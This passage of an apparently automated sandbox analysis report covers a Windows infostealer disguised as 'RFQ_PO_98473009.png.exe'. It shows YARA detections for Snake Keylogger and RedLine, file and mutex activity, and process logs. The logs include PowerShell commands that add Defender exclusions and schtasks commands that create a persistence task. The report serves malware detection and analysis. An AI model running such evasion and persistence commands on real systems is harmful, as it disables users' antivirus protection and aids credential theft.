                      Source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: Native_New-Nova.exe PID: 7852, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: Native_snake01.exe PID: 7944, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: Native_New-Nova.exe PID: 3000, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: Native_snake01.exe PID: 2524, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: RFQ_PO_98473009.png.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: lVbhkOPdhyxT.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                      Source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, rGDpxZKaqlGF0mXsfS.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, rGDpxZKaqlGF0mXsfS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, tJDSOWc3BWGGq4Qa2q.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, tJDSOWc3BWGGq4Qa2q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, tJDSOWc3BWGGq4Qa2q.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, rGDpxZKaqlGF0mXsfS.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, rGDpxZKaqlGF0mXsfS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, tJDSOWc3BWGGq4Qa2q.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, tJDSOWc3BWGGq4Qa2q.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, tJDSOWc3BWGGq4Qa2q.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@32/22@5/5
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeFile created: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeMutant created: \Sessions\1\BaseNamedObjects\WHevGRDjrEOC
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2D18.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCommand line argument: 08A10_2_00413780
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCommand line argument: 08A12_2_00413780
                      Source: RFQ_PO_98473009.png.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: RFQ_PO_98473009.png.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Native_New-Nova.exe, 0000000A.00000002.3627009294.000000000275C000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3627009294.000000000277A000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3627009294.000000000276C000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.000000000262D000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.000000000264B000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.000000000263D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: RFQ_PO_98473009.png.exeVirustotal: Detection: 51%
                      Source: RFQ_PO_98473009.png.exeReversingLabs: Detection: 52%
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeFile read: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_9-91
                      Source: unknownProcess created: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe "C:\Users\user\AppData\Local\Temp\Native_snake01.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp4227.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess created: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe "C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe"
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe"
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe "C:\Users\user\AppData\Local\Temp\Native_snake01.exe"
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe "C:\Users\user\AppData\Local\Temp\Native_snake01.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp4227.tmp"
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess created: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe "C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe"
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe"
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe "C:\Users\user\AppData\Local\Temp\Native_snake01.exe"
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeSection loaded: iertutil.dllJump to behavior
